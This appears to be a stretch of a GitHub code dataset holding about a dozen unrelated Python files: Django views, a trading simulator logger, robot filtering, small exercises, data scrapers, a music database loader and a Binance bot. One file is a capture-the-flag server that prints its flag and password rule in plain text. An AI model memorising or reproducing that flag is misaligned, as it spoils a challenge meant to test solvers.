   return HttpResponse('Payment added')\n    return render(request, 'add_payment.html', {'form' : form})\n\nclass BillForm(forms.Form):\n    record = forms.ModelChoiceField(label = 'Client', queryset = Record.objects.all())\n    \n@login_required(login_url = '/login/')\ndef bill(request):\n    form = BillForm(request.GET or None)\n    if request.method 
== 'GET' and form.is_valid():\n record = form.cleaned_data['record']\n payments = Additional_payment.objects.filter(record = record)\n total = record.total\n room_price = record.room.tariff.units\n return render(request, 'bill.html', {'room_price' : room_price,'form':form, 'total' : total, 'payments' : payments})\n return render(request,'bill.html',{'form':form})\n\n@login_required(login_url = '/login/')\ndef main(request):\n return render(request, 'main.html',{})\n\nfrom django.contrib.auth import logout\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect('/login/?next=/')\n \n \n \n \n \n\n","repo_name":"kirillherz/hotel-management-system","sub_path":"management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"34042896573","text":"import ctypes\nimport json\nimport os\nimport sys\nimport pandas as pd\npd.set_option('display.max_columns', None)\n\n# Root directory of the project\nROOT_DIR = os.path.abspath(\"./\")\nprint(ROOT_DIR+\"/rl_game/game\")\n\n# import game.so\nos.chdir(ROOT_DIR+\"/rl_game/game\")\nsoFile = \"./game.so\"\nexpso = ctypes.cdll.LoadLibrary(soFile)\n\ninfo_names = [\n \"Done\",\n \"LastPrice\",\n \"BidPrice1\",\n \"BidVolume1\",\n \"AskPrice1\",\n \"AskVolume1\",\n \"BidPrice2\",\n \"BidVolume2\",\n \"AskPrice2\",\n \"AskVolume2\",\n \"BidPrice3\",\n \"BidVolume3\",\n \"AskPrice3\",\n \"AskVolume3\",\n \"BidPrice4\",\n \"BidVolume4\",\n \"AskPrice4\",\n \"AskVolume4\",\n \"BidPrice5\",\n \"BidVolume5\",\n \"AskPrice5\",\n \"AskVolume5\",\n \"Volume\",\n \"HighestPrice\",\n \"LowestPrice\",\n \"TradingDay\",\n \"Target_Num\",\n \"Actual_Num\",\n \"AliveBidPrice1\",\n \"AliveBidVolume1\",\n \"AliveBidPrice2\",\n \"AliveBidVolume2\",\n \"AliveBidPrice3\",\n \"AliveBidVolume3\",\n \"AliveBidPriceNUM\",\n \"AliveBidVolumeNUM\",\n \"AliveAskPrice1\",\n \"AliveAskVolume1\",\n \"AliveAskPrice2\",\n \"AliveAskVolume2\",\n \"AliveAskPrice3\",\n \"AliveAskVolume3\",\n \"AliveAskPriceNUM\",\n \"AliveAskVolumeNUM\",\n \"score\",\n \"profit\",\n \"total_profit\",\n \"baseline_profit\",\n \"close_profit\",\n \"action\",\n]\n\narr_len = 100\narr1 = ctypes.c_int * arr_len\narr = ctypes.c_int * 1\n\nactions = arr1()\naction_len = arr()\ninfos = arr1()\ninfos_len = arr()\nrewards = arr1()\nrewards_len = arr()\n\nall_data = []\n\nfor start_day in range(1, 91):\n\n # day_data = []\n\n start_info = {\"date_index\": f\"{start_day} - {start_day}\", \"skip_steps\": 0}\n ctx = expso.CreateContext(json.dumps(start_info).encode())\n\n expso.GetInfo(ctx, infos, infos_len)\n expso.GetReward(ctx, rewards, rewards_len)\n\n step = 1\n action = 0\n while True:\n\n expso.GetInfo(ctx, infos, infos_len)\n expso.GetReward(ctx, rewards, rewards_len)\n\n info_dict = {}\n for i in range(44):\n info_dict[info_names[i]] = infos[i]\n for i in range(5):\n info_dict[info_names[i + 44]] = rewards[i]\n info_dict[info_names[48]] = action\n # print(info_dict)\n # day_data.append(info_dict)\n all_data.append(info_dict)\n\n done = infos[0]\n if done == 1:\n print(\"Day\", infos[25], \"data_len:\", step)\n # day_data_df = pd.DataFrame(day_data)\n # day_data_df.to_csv(ROOT_DIR + \"/r18-day\" + str(start_day) + \"-baseline_policy.csv\")\n # print(\"day\" + str(start_day) + \"data saved in \" + ROOT_DIR + \"/r18-day\" + str(\n # start_day) + \"-baseline_policy.csv\")\n expso.ReleaseContext(ctx)\n break\n\n target_num = infos[26]\n actual_num = infos[27]\n\n action 
= 0\n\n        # if abs(actual_num - target_num) > 5:\n        #     if target_num > actual_num:\n        #         action = 6\n        #     else:\n        #         action = 9\n\n        expso.Action(ctx, action)\n        expso.Step(ctx)\n        step += 1\nall_data_df = pd.DataFrame(all_data)\nprint(all_data_df.tail())\nprint(all_data_df.describe())\nall_data_df.to_csv(ROOT_DIR + \"/r18-all_data.csv\")\nprint(\"all_data saved in \" + ROOT_DIR + \"/r18-all_data.csv\")\n","repo_name":"LiuShuai26/trading-game","sub_path":"game_data/savedata.py","file_name":"savedata.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73250595821","text":"from robot_simulation import UnscentedKalmanFilter\nfrom .model import Model\nfrom .receiver import Receiver\nimport numpy as np\nimport datetime\n\n# implements robot control, much like treerobot/test_robot.py\n# the example robot is described in detail in that same file\n\n\nclass GalileoRobot:\n    Model = Model\n\n    def __init__(self):\n        self._filter = UnscentedKalmanFilter(GalileoRobot.Model)\n        self._updated = False\n        self._receiver = Receiver()\n\n    def enabled(self):\n        return True\n\n    def paused(self):\n        return not self._updated\n    \n    def stop(self):\n        self._receiver.stop()\n\n    def estimate(self):\n        if not self.enabled():\n            return\n\n        self._updated, dt, self._posx, self._posy, self._speed, self._angle = self._receiver.update()\n\n        if self._updated:\n            self._last_updated_time = datetime.datetime.now()\n\n            u, x_deviation = self._controlInput()\n            self._filter.predict(dt, u, np.diag(x_deviation) ** 2)\n\n            z, z_deviation = self._observeGNSS()\n            xEst, PEst = self._filter.update(z, np.diag(z_deviation) ** 2)\n\n            return dt, u, z, xEst, PEst\n        else:\n            return None\n    \n    def _controlInput(self):\n        u = [0] * GalileoRobot.Model.usize\n        u[GalileoRobot.Model.uspeed] = self._speed\n        u[GalileoRobot.Model.uangle] = self._angle\n\n        x_deviation = [0] * Model.xsize\n        x_deviation[Model.xposx] = 0.93\n        x_deviation[Model.xposy] = 2.04\n        x_deviation[Model.xangle] = 2.862387\n        x_deviation[Model.xspeed] = 0.5527557\n\n        return u, x_deviation\n\n    def _observeGNSS(self):\n        z = [0] * GalileoRobot.Model.zsize\n        z[GalileoRobot.Model.zposx] = self._posx\n        z[GalileoRobot.Model.zposy] = self._posy\n\n        z_deviation = [0] * Model.zsize\n        z_deviation[Model.zposx] = 3\n        z_deviation[Model.zposy] = 3\n\n        return z, z_deviation\n","repo_name":"BinaryCat17/treerobot","sub_path":"tree_robot/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"39240826610","text":"\"\"\"\n    HackerRank exercise\nGiven a string of lowercase letters in the range ascii[a-z], determine the index of\na character that can be removed to make the string a palindrome. There may be more than\none solution, but any will do. If the word is already a palindrome or there is no\nsolution, return -1. 
Otherwise, return the index of a character to remove.\n    Example\ns = \"bcbc\"\nEither remove 'b' at index 0 or 'c' at index 3.\n\n    Function Description\nComplete the palindromeIndex function in the editor below.\npalindromeIndex has the following parameter(s):\n - string s: a string to analyze\n    Returns\nint: the index of the character to remove or -1\n    Input Format\nThe first line contains an integer q, the number of queries.\nEach of the next q lines contains a query string s.\n\"\"\"\n\ndef palindromeIndex(s):\n    if s == s[::-1]:\n        return -1\n    for i in range(len(s) // 2 + 1):\n        if s[i] != s[len(s) - 1 - i]:\n            p = s[:i] + s[i + 1:]\n            p1 = s[:len(s) - 1 - i] + s[len(s) - i:]\n            if p == p[::-1]:\n                return i\n            elif p1 == p1[::-1]:\n                return len(s) - 1 - i\n    return -1\n\n\nif __name__ == '__main__':\n    print(3, palindromeIndex('aaab'))\n    print(0, palindromeIndex('baa'))\n    print(-1, palindromeIndex('aaa'))","repo_name":"swisskanton/hackerRankAndCodeWars","sub_path":"palindromeIndex.py","file_name":"palindromeIndex.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"6230827867","text":"import random\n\na = random.randint(1,10)\n\nguess = 0\ntries = 3\n\nwhile guess!=a:\n\t\n\tprint (f'you have {tries} tries')\n\tguess = int(input(\"guess: \"))\n\t\n\tif guess > a:\n\t\tprint ('too high')\n\telif guess < a:\n\t\tprint ('too low')\n\telse: \n\t\tprint(\"just right\")\n\t\tbreak\n\tif tries == 1:\n\t\tprint ('unfortunately, you lost')\n\t\tbreak\n\ttries-=1\n\t\n","repo_name":"DankoDmitry/university","sub_path":"Bio/sem1/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7059399186","text":"# pylint: disable = C0114, C0115, C0116, C0103\n\nimport pandas as pd\nfrom colorama import Fore\nfrom clientSelection.ClientSelection import ClientSelection\n\n\nclass ResourceClientSelection(ClientSelection):\n    \"\"\"\n    A class that inherits the client selection module, which selects clients\n    according to the strength of their resources.\n\n    ...\n\n    Attributes\n    ----------\n    nodes : list\n        The list of all nodes in the environment.\n    K : float\n        the percentage of the selection.\n    debug_mode : bool\n        Indicates if the debug mode is enabled or not.\n\n    Methods\n    -------\n    resource_client_selection():\n        Returns a list of clients selected according to their power ranking.\n\n    \"\"\"\n\n    # ? Select clients according to their resources. 
(The top ones with average power)\n    def __init__(self, nodes: list, K: float = 0.1, debug_mode: bool = False):\n        \"\"\"\n        Constructs all the necessary attributes for the ResourceClientSelection object.\n\n        Parameters\n        ----------\n        nodes : list\n            The list of all nodes in the environment.\n        K : float\n            the percentage of the selection.\n        debug_mode : bool, optional\n            Indicates if the debug mode is enabled or not.\n\n        \"\"\"\n        super().__init__(nodes, debug_mode)\n        self.K = K\n        self.debug_mode = debug_mode\n\n    def resource_client_selection(self) -> list:\n        \"\"\"\n        Return the list of the selected nodes according to their power.\n\n        Parameters\n        ----------\n\n\n        Returns\n        -------\n        selected_clients (list): the list of the nodes.\n\n        Examples\n        --------\n        >>> resourceClientSelection.resource_client_selection()\n\n        \"\"\"\n        print(f\"{Fore.LIGHTYELLOW_EX}[*] Starting client selection by resources\")\n        selected_clients = []\n        percentage = int(len(self.nodes) * self.K)\n        resource_df = pd.DataFrame()\n\n        for node in self.nodes:\n            # ? Collect the node's resources.\n            rsrc_info = node.get_resources_information()\n            name, cpu_power, cpu_usage, memory, memory_usage, total_storage, \\\n                current_storage, battery_usage, total_energy, energy_consumption, current_energy, * \\\ndata_length, date = rsrc_info\n\n            data = {\"Node\": node, \"Name\": name, \"cpu_power\": cpu_power, \"cpu_usage\": cpu_usage,\n                    \"memory\": memory, \"memory_usage\": memory_usage, \"total_storage\": total_storage,\n                    \"current_storage\": current_storage, \"battery_usage\": battery_usage,\n                    \"total_energy\": total_energy, \"energy_consumption\": energy_consumption,\n                    \"current_energy\": current_energy, \"data_length\": data_length, \"Date\": date}\n            # ? Put collected resources on DataFrame.\n            resource_df = pd.concat([resource_df, pd.DataFrame.from_records([data])])\n\n        resource_df['avg_power'] = resource_df[['total_energy', 'total_storage',\n                                                'cpu_power', 'memory']].mean(axis=1)\n        # ? The top ones with average power (nlargest requires an integer n)\n        selected_nodes = resource_df.nlargest(n=percentage, columns=['avg_power']).Node.values\n        for client in selected_nodes:\n            selected_clients.append(client)\n\n        return selected_clients\n","repo_name":"mohamediniesta/CLiS-FL","sub_path":"clientSelection/ResourceClientSelection.py","file_name":"ResourceClientSelection.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"74595101115","text":"\"\"\"\nKrishna Panchapagesan, Mark Pock\nCSE 163 Final Project\n\nModifies the CSV containing the ratios between stock index points and their\n2010 prices to include a column for a weighted average based on GDP and\nmarket capitalisation.\n\"\"\"\n\nimport os\nimport pandas as pd\nfrom utils import web_tables, time_series\n\n\ndef generate_csvs(regions: dict):\n    \"\"\"\n    Given a dictionary regions containing the urls on MacroTrends for the\n    gdps of certain regions as values for keys as the names of those regions,\n    generates the csvs for them (and the csv for the US, whose data comes from\n    a different site). 
Procedural, to be used only if csvs do not already\n exist or in the case of adding new regions from MacroTrends.\n \"\"\"\n curr_csvs = os.listdir('./datasets/gdps/')\n if not all((item + '.csv') in curr_csvs for item in regions.keys()):\n for region in regions:\n web_tables(regions[region], region, 'gdps/', (1, 2))\n regions['USA'] = 'https://www.thebalance.com/us-gdp-by-year-3305543'\n if 'USA.csv' not in curr_csvs:\n web_tables(regions['USA'], 'USA', 'gdps/')\n\n\ndef tril_to_bil(trillion: str) -> float:\n \"\"\"\n Given a str trillion representing the nominal GDP of the US in trillions of\n dollars as contained in the data from thebalance.com (in the form\n $num.num with occasional typing errors where the period is replaced by a\n comma), returns a float giving the billions of dollars corresponding to\n the amount.\n \"\"\"\n return 1000 * float(trillion.split('$')[1].replace(',', '.'))\n\n\ndef clean_bil(billion: str) -> float:\n \"\"\"\n Given a str billion representing the nominal GDP of a nation in billions of\n dollars as contained in the data from MacroTrends (in the form\n $num,num.numB, returns a float with the numerical amount isolated.\n \"\"\"\n return float(billion[1:-1].replace(',', ''))\n\n\ndef main():\n macrotrends = 'https://www.macrotrends.net/countries/'\n gdp = 'gdp-gross-domestic-product'\n regions = {'Europe': macrotrends + 'EUU/european-union/' + gdp,\n 'China': macrotrends + 'CHN/china/' + gdp,\n 'Japan': macrotrends + 'JPN/japan/' + gdp}\n generate_csvs(regions)\n places = list(regions.keys())\n\n reg_dfs = [time_series(reg, 'gdps/', 'Year') for reg in regions]\n nomgdp = reg_dfs[-1]['USA Nominal GDP (trillions)']\n reg_dfs[-1].loc[:, 'USA GDP'] = nomgdp.apply(tril_to_bil)\n\n for i in range(len(reg_dfs) - 1):\n currgdp = reg_dfs[i].loc[:, places[i] + ' GDP']\n reg_dfs[i].loc[:, places[i] + ' GDP'] = currgdp.apply(clean_bil)\n\n gdp_series = [reg_dfs[i][places[i] + ' GDP'] for i in range(len(regions))]\n df = pd.DataFrame(gdp_series[0])\n for series in gdp_series[1:]:\n df = df.join(series, how='outer')\n df.columns = [col.split()[0] for col in df.columns]\n df.index.name = 'Date'\n df.to_csv('./datasets/gdps/pared.csv')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"krishna-panchap/163-Final-Project","sub_path":"process_gdps.py","file_name":"process_gdps.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26759124654","text":"import numpy as np \nimport pandas as pd \nimport csv\n\n\ndef addrow(full_band_dict, object_id, mjd, wfile):\n\tnew_row = [object_id, int(mjd)]\n\tfor band in ['u','g','r','i','z','y']:\n\t\tif band not in full_band_dict:\n\t\t\tnew_row += [None, None]\n\t\telse:\n\t\t\tnew_row += full_band_dict[band]\n\twfile.writerow(new_row)\n\t# print(new_row)\n\ndata = pd.read_csv('../code/rawdata/test_set_batch2.csv') #csv file need to be converted\nmeta = pd.read_csv('../code/rawdata/unblinded_test_set_metadata.csv') # metadata\n\n\nmeta = meta[(meta['ddf']<1)&(meta['target']==88)]\nWDF_obj = meta.groupby('object_id')['object_id'].apply(list)\n\nfile = open('preprocessed_data/test_converted_AGN.csv','w')\n\nwfile = csv.writer(file)\nwfile.writerow(['id','mjd','u','u_err','g','g_err','r','r_err','i','i_err','z','z_err','y','y_err'])\nband_dict = {0:'u',1:'g',2:'r',3:'i',4:'z',5:'y'}\nlast_id = None\nlast_mjd = None\nfull_band_dict = {}\nn = 0\ncheck = 0\nwhile n < len(data):\n\tif data['object_id'][n] in WDF_obj:\n\t\tif 
data['object_id'][n]==last_id:\n\t\t\tdelta_mjd = data['mjd'][n] - last_mjd\n\t\t\tif delta_mjd >=0.5:\n\t\t\t\taddrow(full_band_dict, last_id, last_mjd, wfile)\n\t\t\t\tfull_band_dict = {}\n\t\t\t\tlast_mjd = data['mjd'][n]\n\t\t\tif band_dict[data['passband'][n]] not in full_band_dict:\n\t\t\t\tfull_band_dict[band_dict[data['passband'][n]]] = [data['flux'][n],data['flux_err'][n]]\n\t\telse:\n\t\t\tif last_id != None and last_mjd != None:\n\t\t\t\taddrow(full_band_dict, last_id, last_mjd, wfile)\n\t\t\tlast_id = data['object_id'][n]\n\t\t\tlast_mjd = data['mjd'][n]\n\t\t\tprint(last_id)\n\t\t\tcheck +=1\n\t\t\tn -=1\n\n\tn +=1\n\nprint('check:', check)\nprint('test num:', len(WDF_obj))\n\n\n\n","repo_name":"XinyueSheng2019/QuasarClassifier","sub_path":"data/lsst/preprocess/convert_band.py","file_name":"convert_band.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10626546267","text":"from doubly_linked_base import PositionalList\n\nclass FavouritesList:\n \"\"\"List of elements ordered from most frequently accessed to least\"\"\"\n \"\"\"Using a PositionalList\"\"\"\n\n #-----------nested _Item class----------------\n class _Item:\n __slots__ = '_value', '_count' #streamline memory usage\n def __init__(self, element):\n self._value = element #user's element\n self._count = 0 #access count init zero\n\n #-----------nonpublic utilities---------------\n def _find_position(self, e):\n \"\"\"Search for element e and return its position (or None if not found)\"\"\"\n walk = self._data.first();\n while walk is not None and walk.element()._value != e:\n walk = self._data.after(walk)\n return walk\n\n def _move_up(self, p):\n \"\"\"Move item at Position p earlier in the list based on access count\"\"\"\n if p != self._data.first():\n cnt = p.element()._count\n walk = self._data.before(p)\n if cnt > walk.element()._count:\n while (walk != self._data.first() and\n cnt > self._data.before(walk).element()._count):\n walk = self._data.before(walk)\n self._data.add_before(walk, self._data.delete(p)) #delete/reinsert\n\n def __init__(self):\n \"\"\"Create empty list of favourites\"\"\"\n self._data = PositionalList() #list of _Item instances\n\n def __len__(self):\n \"\"\"Return number of entries on fav list\"\"\"\n return len(self._data)\n\n def is_empty(self):\n \"\"\"Return True if list is empty.\"\"\"\n return len(self._data) == 0\n\n def access(self, e):\n \"\"\"Access element e, thereby increasing its access count\"\"\"\n p = self._find_position(e)\n if p is None:\n p = self._data.add_last(self._Item(e))\n p.element()._count += 1\n self._move_up(p) #consider moving forward\n\n def remove(self, e):\n \"\"\"Remove element e from list of favs\"\"\"\n p = self._find_position(e)\n if p is not None:\n self._data.delete(p)\n\n def top(self, k):\n \"\"\"Generate sequence of top k elements in terms of access count\"\"\"\n if not 1 <= k <= len(self):\n raise ValueError('Illegal value for k')\n walk = self._data.first()\n for j in range(k):\n item = walk.element()\n yield item._value\n walk = self._data.after(walk)\n\n\ntheList = PositionalList()\na = theList.add_first('4')\nb = theList.add_after(a, '2')\nc = theList.add_after(b, '1')\n\nfavList = FavouritesList()\nfavList.access('1')\nfavList.access('2')\nfavList.access('3')\nfavList.access('1')\nfavList.access('1')\nfavList.access('3')\ntheList = list(favList.top(3))\nfor thing in theList:\n 
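    # editor's note: with the access pattern above -- '1' three times, '3' twice, '2' once --\n    # the move-to-front bookkeeping in _move_up keeps the positional list ordered by access\n    # count, so this loop prints 1, 3, 2.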
print(thing)","repo_name":"snozza/algorithms_structures","sub_path":"src/favourites_list.py","file_name":"favourites_list.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30635056880","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\nimport json\nfrom basic_functions import *\n\ndef get_pages_youdu():\n ''' a function that gets the page urls\n\n This function gets the urls of the main pages which list the books\n\n Parameters\n ----------\n None \n\n Returns\n -------\n pages_youdu: list\n a list of main page urls\n '''\n\n baseurl = \"https://www.youdubook.com\"\n listurl = '/booklibrary/index/str/0_0_0_0_0_2_0'\n url = baseurl + listurl\n pages_youdu = []\n for i in range(1,9): # there are page 1-8\n page_url = url + '?page=' + str(i)\n pages_youdu.append(page_url) \n return pages_youdu\n \ndef get_books_youdu(page_url):\n ''' a function that gets the books' infos on one main page\n\n Parameters\n ----------\n page_url: string\n the url of the main page \n\n Returns\n -------\n booklist: list\n a list of the retrived book\n '''\n\n cache_flag = 0\n if os.path.exists('cache.json'):\n cache = cache_read()\n if page_url in cache:\n print(\"Using cache\")\n page_info = cache[page_url]\n cache_flag = 1\n if cache_flag == 0:\n print('Fetching')\n headers = {'User-Agent': 'UMSI 507 Course Project',\n 'From': 'yuanfenw@umich.edu',\n 'Course-Info': 'https://www.si.umich.edu/programs/courses/507'}\n response = requests.get(page_url, headers=headers)\n page_info = response.text\n cache_save('cache.json', page_url, page_info)\n\n soup = BeautifulSoup(page_info, 'html.parser')\n # Get the book_list_parent\n book_list_parent = soup.find('div', class_='BooklibraryList').find('ul')\n ## loop through the child divs\n book_listing = book_list_parent.find_all('li', recursive=False)\n\n count = 0\n flag = 0\n booklist = []\n for book in book_listing:\n ### extract book details url\n if flag == 1:\n flag = 0\n count += 1\n if count % 10 == 0:\n print(f'Now retrieving book {count}')\n if count == 32:\n break\n continue\n flag = 1\n temp = book.find('span', recursive=False)\n book_header = temp.find('a').text\n book_href = temp.find('a')['href']\n book = get_bookdetail_youdu(book_href)\n booklist.append(book)\n return booklist\n\ndef get_bookdetail_youdu(book_url):\n ''' a function that gets the book infos \n\n Parameters\n ----------\n book_url: string\n the url of the book page \n\n Returns\n -------\n book: Book\n a book instance with retrived infos\n '''\n\n cache_flag = 0\n if os.path.exists('cache.json'):\n cache = cache_read()\n if book_url in cache:\n print(\"Using cache\")\n html_page = cache[book_url]\n cache_flag = 1\n if cache_flag == 0:\n print(\"Fetching\")\n headers = {'User-Agent': 'UMSI 507 Course Project',\n 'From': 'yuanfenw@umich.edu',\n 'Course-Info': 'https://www.si.umich.edu/programs/courses/507'}\n response = requests.get(book_url, headers=headers)\n html_page = response.text\n cache_save('cache.json', book_url, html_page)\n\n soup_detail = BeautifulSoup(html_page, 'html.parser')\n ## extract book details\n book_label_temp = soup_detail.find('div', class_='label').find('ul').find_all('li', class_='')\n if len(book_label_temp) == 0:\n book_label = 'No category'\n else:\n book_label = book_label_temp[0].text\n book_size = soup_detail.find('div', class_='Font').find_all('span')[0].text\n book_description = soup_detail.find('div', class_='synopsisCon').text.strip()\n 
book_title = soup_detail.find('div', class_='title')\n    book_name = book_title.find('span').text.strip()\n    book_date = book_title.find('i').text.split(' ')[0][-10:]\n    book_like = soup_detail.find('li', class_='TouRecommendedVotes').text\n    book_like = book_like.split('чеи')[1]\n    book = Book(book_label, book_name, book_size, book_description, book_date, book_like, book_url)\n    return book\n\n","repo_name":"wustone1995/SI507-FINAL","sub_path":"crawl_youdu.py","file_name":"crawl_youdu.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12334524100","text":"#! /usr/bin/env python\n# populate_db.py\n# Gina Schmalzle\n# 20140723, works\n\n\"\"\"Database populating tools for Million Song Database. These scripts assume that\nyou already created the bones for your sqlite3 database. The script to do that is\nin ../DATA/DB/build_DB/ and has the following structure:\n\nDROP TABLE IF EXISTS users;\nCREATE TABLE users (\n    id INTEGER PRIMARY KEY,\n    user TEXT,\n    selection_number NUMBER,\n    artist_id TEXT,\n    artist_name TEXT,\n    date_added TEXT,\n    foreign_id TEXT,\n    last_modified TEXT,\n    song_id TEXT,\n    song_name TEXT\n);\n\nThese functions allow the user to obtain a list of files that were downloaded,\nretrieve the contents of the files in the form of a dictionary, retrieve the\ncontents as a list of tuples, and finally populate the database.\n\nTo run in python repl (assuming your database is in the same place I have it):\n\n    import populate_db as P\n    P.populate_db_w_users()\n\nTo check if data have been properly uploaded, type in the terminal:\n    sqlite3 yourdb.db\n    SELECT * FROM users;\n\nEnjoy.\n\"\"\"\n\nimport os\nimport sqlite3\nimport ast\nimport time\nimport shutil\nimport glob\nimport unicodedata\n\ndef retrieve_user_files(path='../DATA/DOWNLOADS/'):\n    \"\"\"Get list of user files in a given directory.\"\"\"\n    file_list = glob.glob(path+'*.dict')\n    return file_list\n\ndef retrieve_all_user_data_as_dict(files=retrieve_user_files()):\n    \"\"\" Retrieve user information from file. \"\"\"\n    contents_dict = {}\n    for file in files:\n        user = file[18:36]\n        with open(file, 'r') as f:\n            contents = f.read()\n        contents_dict[user] = ast.literal_eval(contents)\n    return contents_dict\n\ndef retrieve_all_user_data_as_list_of_tuples(files=retrieve_user_files()):\n    \"\"\" Retrieve user information from file. 
\"\"\"\n contents_list = []\n contents_dict = retrieve_all_user_data_as_dict(files)\n for user in contents_dict:\n user_id = user\n for i in range(0, len(contents_dict[user])):\n selection_number = i\n try:\n artist_id = contents_dict[user][i]['artist_id'].encode('utf8')\n artist_name = contents_dict[user][i]['artist_name'].encode('utf8')\n date_added = contents_dict[user][i]['date_added'].encode('utf8')\n foreign_id = contents_dict[user][i]['foreign_id'].encode('utf8')\n last_modified = contents_dict[user][i]['last_modified'].encode('utf8')\n play_count = int(contents_dict[user][i]['play_count'])\n song_id = contents_dict[user][i]['song_id'].encode('utf8')\n song_name = contents_dict[user][i]['song_name'].encode('utf8')\n contents_list.append((user_id,selection_number,artist_id,\n artist_name, date_added, foreign_id, last_modified, play_count,song_id,\n song_name))\n except KeyError:\n artist_id = contents_dict[user][i]['artist_id'].encode('utf8')\n artist_name = contents_dict[user][i]['artist_name'].encode('utf8')\n date_added = contents_dict[user][i]['date_added'].encode('utf8')\n foreign_id = contents_dict[user][i]['foreign_id'].encode('utf8')\n last_modified = contents_dict[user][i]['last_modified'].encode('utf8')\n play_count = 9999\n song_id = contents_dict[user][i]['song_id'].encode('utf8')\n song_name = 'NA'\n contents_list.append((user_id,selection_number,artist_id,\n artist_name, date_added, foreign_id, last_modified, play_count, song_id,\n song_name))\n print (\"No song name for user \", user_id, \"song number\", i)\n continue\n return contents_list\n\ndef populate_db_w_users(to_print=None, db='music_user.db'):\n \"\"\"Populate database with contents of site list.\"\"\"\n list_of_users = retrieve_all_user_data_as_list_of_tuples()\n connection = sqlite3.connect(os.path.join('../DATA/DB/', db))\n with connection:\n cursor = connection.cursor()\n i = 0\n for user in list_of_users:\n i = i + 1\n mytuple = (i,user[0],user[1],user[2],user[3],user[4],user[5],user[6],user[7],user[8], user[9])\n if user == ['']:\n print('\\n Empty tuple found; skipping.\\n')\n continue\n if to_print:\n print(str(mytuple))\n try:\n cursor.execute(\n '''INSERT INTO users VALUES''' +\n str(tuple(mytuple)) )\n except:\n i = i - 1\n continue\n","repo_name":"ginaschmalzle/million_song","sub_path":"CODE/populate_db.py","file_name":"populate_db.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"2811824573","text":"#! 
/usr/bin/env python3\nimport random\nimport select\nimport sys\n\nL_WORDS = [\n \"labels\",\n \"laboratories\",\n \"labs\",\n \"labyrinths\",\n \"ladders\",\n \"ladles\",\n \"lagers\",\n \"lakes\",\n \"lamebrains\",\n \"lampreys\",\n \"landlines\",\n \"lanyards\",\n \"lasagnas\",\n \"lathes\",\n \"laughingstocks\",\n \"launderers\",\n \"lawbreakers\",\n \"layovers\",\n \"laypersons\",\n \"leeches\",\n \"legumes\",\n \"lemurs\",\n \"lentils\",\n \"leopards\",\n \"leotards\",\n \"leprechauns\",\n \"lettuces\",\n \"ligaments\",\n \"limeades\",\n \"limericks\",\n \"limes\",\n \"lions\",\n \"litterbugs\",\n \"lizards\",\n \"llamas\",\n \"lobsters\",\n \"locusts\",\n \"loganberries\",\n \"logarithms\",\n \"lolcats\",\n \"lollipops\",\n \"loudmouths\",\n \"lozenges\",\n \"lumps\",\n \"luxurious\",\n \"lynxes\",\n]\n\nFLAG = \"fb{th4t5_th3_3vi1est_th1ng_!_c4n_im4g1ne}\"\nTIMEOUT = 5\n\nif __name__ == '__main__':\n if 'bad' in sys.argv:\n print(\"Clearly you're not evil enough.\")\n sys.stdout.flush()\n sys.exit(1)\n else:\n word = random.choice(L_WORDS)\n print(\"So you know the evil handshake?\\nWhat's the secret password then?\\nThe word of the day is {}.\".format(word))\n sys.stdout.flush()\n i, o, e = select.select([sys.stdin], [], [], TIMEOUT)\n if i:\n x = sys.stdin.readline().strip()\n else:\n print(\"Too slow, move along.\")\n sys.exit(2)\n\n # sys.stderr.write(\"Received: {}\\n\".format(x))\n if x == \"Every Villain Is {}\".format(word.capitalize()):\n print(FLAG)\n sys.stdout.flush()\n sys.exit(0)\n else:\n print(\"Wrong password! Get lost do-gooder!\")\n sys.stdout.flush()\n sys.exit(3)\n","repo_name":"fbsamples/fbctf-2019-challenges","sub_path":"misc/evil/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"96"} +{"seq_id":"32340702445","text":"from binance.client import Client\nimport sys\ntry:\n from config import api_key,api_secret\nexcept:\n print(\"Make config.py\\npaste your api_key='<YOUR_KEY>' and api_secret='<YOUR_SECRETE_KEY>'\")\n sys.exit()\nfrom binance.websockets import BinanceSocketManager\nfrom binance.enums import *\nfrom binance.exceptions import BinanceAPIException, BinanceWithdrawException\nfrom math import floor\nimport os\n\norders = []\nlast_error_message=''\nquantity = 0\ndef process_message(msg):\n # print(\"message type: {}\".format(msg['e']))\n global quantity,last_error_message\n os.system('clear')\n print('Trading:',coin)\n print('Fraction:',fraction)\n print('Buying price:',buy_price)\n print('Selling price:',sell_price)\n print('Profit percentage:',profit)\n print('Current price: ',msg['b'])\n print('Weighted Average price:', msg['w'])\n print('High price:', msg['h'])\n print('Low price:', msg['l'])\n print('Quantity',quantity)\n print('last_error_message:',last_error_message)\n 